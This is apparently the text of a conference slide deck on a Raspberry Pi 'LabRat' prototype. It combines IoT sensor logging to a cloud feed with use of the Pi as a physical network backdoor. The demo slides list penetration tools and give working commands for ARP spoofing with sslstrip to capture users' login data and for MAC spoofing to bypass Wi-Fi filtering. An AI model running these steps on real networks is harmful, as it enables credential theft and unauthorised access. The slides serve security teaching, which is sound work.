The LabRat Physical Backdoor Hacks

and Internet of Things (IOT) Primer

Akshat Sharma, TME, Cisco Systems.

The Raspberry Pi

http://www.raspberrypi.org/downloads Image Downloads and Updates http://elinux.org/RPi_Low-level_peripherals -- working with gpio http://elinux.org/RPiconfig interfacing with screens.

Google’s your Best Friend

Raspberry Pi as a Physical Backdoor into your network

http://securityaffairs.co/wordpress/15471/hacking/raspberry-pi-as-physical-backdoor.html

It’s a device “you can just plug in and do a full-scale penetration test from start to finish,” Porcello says. “The enterprise can use stuff like this to do testing more often and more cheaply than they’re doing it right now.” -- CEO of Pwnie Express, Dave Porcello

Rogue APs

Mac Spoofing on wired Networks

MITM attacks

Humidity Sensor

CH0

CH3

CLK

CS (AL)

MOSI

MISO

IR LED -

Receiver

IR LED -

Receiver

Optical Fiber

CH1 CH2

Binary Signal In

Binary Signal In

The LabRat Circuit Temperature

Sensor

Humidity Sensor

Optical Fiber Tester

The LabRat- a Proof of Concept Prototype

The Raspberry Pi – a 35$ Linux Computer that powers the LabRat prototype.

To get more info on the Raspberry pi – visit http://www.raspberrypi.org/

The LabRat Prototype Current Setup

10 inch Capacitive Touchscreen

Optical Fiber Tester

Humidity Sensor Temperature

Sensor

Raspberry-Pi

HDMi-to-LVDS converter board

10,000 mAH Lithium Polymer Battery

The LabRat Prototype LM 35 + ADS7841 Temperature Sensor

LM 35 Temperature Sensor ADS7841

Analog to Digital Converter

The LabRat Prototype Humidity Sensor SMD + ADS7841

ADS7841 Analog to Digital Converter

Humidity Sensor SMD

The LabRat Prototype Optical Fiber Tester

Optical Fiber Holders

Infra-red LED-Receiver Combination to transmit Messages via the Fiber

Connecting to an IOT Cloud ⁻ https://xively.com/ ⁻ Formerly Cosm, Pachube

Set up a Cosm (Now Xively) Account

• Register on cosm (xively) and Add Device

• You will Receive an API Key and FEED ID

• Now use the old Cosm eeml library to set up Datastreams from the Raspberry Pi

Setting up the Python Script to send Data to Xively

Install EEML package from github sudo apt-get install python-dev sudo apt-get install python-pip sudo easy_install -U distribute sudo pip install rpi.gpio >>>> work with Rpi GPIO pins wget -O geekman-python-eeml.tar.gz https://github.com/geekman/python-eeml/tarball/master tar zxvf geekman-python-eeml.tar.gz cd geekman-python-eeml* sudo python setup.py install

Set up Python Script # source eeml package import eeml

<snip> API_KEY = 'YOUR_API_KEY' FEED = YOUR_FEED_ID API_URL = '/v2/feeds/{feednum}.xml' .format(feednum = FEED)

The LabRat Prototype Online Real-Time Feed –

Temperature and Humidity Visit the Real-Time Feed at https://cosm.com/feeds/89297

The LabRat Prototype Python Scripts

1) Python Script to upload the Temperature and Humidity Data to an online Cloud

based feed that displays how the LabRat , in the Future, may do the same with Sensory Data at Customer Labs to provide Real-Time Analytics.

2) The same Python Script sends an email to lab-admins whenever the Temperature , humidity values exceed a pre-decided Threshold 3) Another Python Script to send messages (Binary Data) through an Optical Fiber using an Infrared LED-Receiver combination and email the data to the user. The same data may later be uploaded to an inventory management system to automatically track working equipment and its performance.

The LabRat Prototype Current List of Penetration-Testing Tools

Information Gathering ------------------- wireshark tcpflow ngrep hostmap kismet btscanner sslscan sslstrip sslsniff ssldump tcptraceroute netmask tcpdump zenmap nmap arp-fingerprint dnswalk dnstracer

Vulnerability Assessment ---------------------- airodump-ng sqlmap nikto svcrack

Exploitation Tools ------------------ aircrack-ng airmon-ng airodump-ng aireplay-ng sqlninja exploit-db

Privilege Escalation ----------------- wireshark ettercap tcpreplay tcpick packit packeth dsnniff

Maintaining Access ---------------- ptunnel netcat ftp-proxt udp-tunnel proxychains dns2tcp

DEMO - Arp Spoofing using SSLstrip and arpspoof - Mac Spoofing using Airmon-ng and

macchanger - Packet Sniffing using Wireshark - Other MITM attacks

Arp Spoofing and Mac-Spoofing Attacks

Arp Spoofing • Set up Port Forwarding iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 echo '1' > /proc/sys/net/ipv4/ip_forward

• Start Arp spoofing. Spoof the Gateway arpspoof -i wlan0 <gateway address>

• Start sslstrip and log User Information (use –k option to logout users from their current sessions, forcing them to re-login) sslstrip -k -l 8080

Mac Spoofing on Wifi (How to bypass Mac Filtering) • ifconfig etho down • airmon-ng start wlan0 • iwlist wlan0 scanning • airodump-ng –c 6 -a --bssid <mac address

of wireless access point> --- Gives info of connected devices • Ifconfig wlan0 down • Now use machchanger • Macchanger –m <mac of allowed

devices> wlan0 • Ifconfig wlan0 up

Putting The Internet of Things into Perspective Co-incidental Cisco Plugin :p

Thank You